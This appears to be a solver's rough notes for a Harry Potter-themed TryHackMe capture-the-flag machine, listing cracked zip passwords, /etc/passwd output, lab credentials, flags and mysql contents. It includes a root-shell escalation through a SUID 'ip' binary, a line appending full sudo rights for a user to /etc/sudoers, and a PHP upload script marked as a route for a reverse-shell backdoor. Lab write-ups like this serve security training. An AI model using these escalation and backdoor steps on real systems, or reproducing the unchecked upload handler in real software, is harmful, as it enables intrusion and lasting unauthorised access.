/robots.txt
/interactive

###anon ftp

zip2john .I_saved_it_harry.zip

paris            (I_saved_it_harry.zip/boot/.pass)


unzip

boot/.pass

neville:ebt1orcp!yx27lxaf9rfn4@v4


users in /home:
draco  harry  hermoine  neville  ubuntu


linenum

[-] Contents of /etc/passwd:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
lxd:x:106:65534::/var/lib/lxd/:/bin/false
messagebus:x:107:111::/var/run/dbus:/bin/false
uuidd:x:108:112::/run/uuidd:/bin/false
dnsmasq:x:109:65534:dnsmasq,,,:/var/lib/misc:/bin/false
sshd:x:110:65534::/var/run/sshd:/usr/sbin/nologin
pollinate:x:111:1::/var/cache/pollinate:/bin/false
holmes:x:1001:1001:,,,:/home/holmes:/bin/bash
mysql:x:112:117:MySQL Server,,,:/nonexistent:/bin/false
ftp:x:113:119:ftp daemon,,,:/srv/ftp:/bin/false
neville:x:1002:1002:,,,:/home/neville:/bin/bash
hermoine:x:1003:1003:,,,:/home/hermoine:/bin/bash
draco:x:1004:1004:,,,:/home/draco:/bin/bash
harry:x:1005:1005:,,,:/home/harry:/bin/bash
ubuntu:x:1006:1006:Ubuntu:/home/ubuntu:/bin/bash



[+] Possibly interesting SGID files:
-rwsr-sr-x 1 root root 376192 Apr 16  2019 /bin/ip

*gtfobins

ip netns add foo
ip netns exec foo /bin/bash -p



/root/headmaster.txt
THM{Albus_Perciva1_Wu1fric_Brian_Dumb1ed0re}





#included in /etc/sudoers.d
hermoine   ALL=(root) NOPASSWD: /bin/date
draco   ALL=(root) NOPASSWD: /usr/bin/easy_install




/home/hermoine/special_spell.txt
THM{its_wingardium_laviosaa_Ron}


/home/draco/achievements.txt
THM{I_unarm3d_dumbled0re}



/home/harry/special_spell.txt
THM{Yeah_1_swallowed_the_sn1tch.}




echo "neville    ALL=(ALL:ALL) ALL" >> /etc/sudoers






*possible backdoor via uploading an rshell in the form of a pdf


/var/www/mystaticsite/resumetaker.php

<?php
if($_FILES['uploadedfile']['type'] != "application/pdf") {
echo "Sorry, we only allow uploading your resumes in magical PDF formats. ";

exit;
}
$uploaddir = 'uploads/';
$uploadfile = $uploaddir.basename($_FILES['uploadedfile']['name']);
if (copy($_FILES['uploadedfile']['tmp_name'], $uploadfile)) {
echo "File is valid, and was successfully uploaded.\n";
} else {
echo "File uploading failed.\n";
}
?>








/var/www/mymainsite/conn.php



<?php
        $servername = "localhost";
        $username = "root";
        $password = "neville_was_chosen";
        $db = "students";
        $FLAG = "THM{wait-for-your-letter!}";

        $conn = new mysqli($servername, $username, $password, $db);

        // Check connection
        if ($conn->connect_error) {
                die("Connection failed");
        }
?>




mysql enum:


db:students
table: non_magic
content: hermoine | @8p9o1yl4f#nd2jk9@d!yfvbs 


db:basement
table:monsters
content: fluffy | THM{I-can-be-controlled-by-a-harp}








*need to crack 

/var/www/mystaticsite/secrets.txt.enc
U2FsdGVkX18IKhVL9uuuhJZ0EsTy+3wAG/JxTqpEK8YOPFilg30kStwV1o4r4sCz





                                        *further enum is after a couple iterations of the box

*ZAP's spider
###http:22

style.cloufare.css
'''
Resurrection stone: ft4zselpuypqmhh!pc@ooo14f 
'''


###http:9371

login.css
'''
/*Elder wand: 38m1recnv6aboxvkfmcs1752#  */
'''




/var/www/html/mymainsite/robots.txt

63 72 65 64 73 2e 74 78 74 20 6d 61 79 62 65 3f




###final flag


/etc/room_of_requirement

Ah, Looking for the diadem? I've told this to Harry already.
Another boy asked for it, years ago.
If you have to ask, you
ll never know. If you know, you need only ask.
-Helena Rawenclaw
The room is located on the <>seventh floor<> in the <>left corridor<> of the Hogwarts castle and has a <>hidden<> entrance opposite the tapestry depicting the attempt of Barnabas the Barmy to teach trolls ballet. The way to open the room is to walk past it thinking hard about what you need, and the door will appear.

Invisibilty cloak: a81!0x0v5e3soyz!m!lc#v2n8 


/etc/left_corridor/seventh_floor/.entrance

THM{That-boy-was-Tom-Riddle}
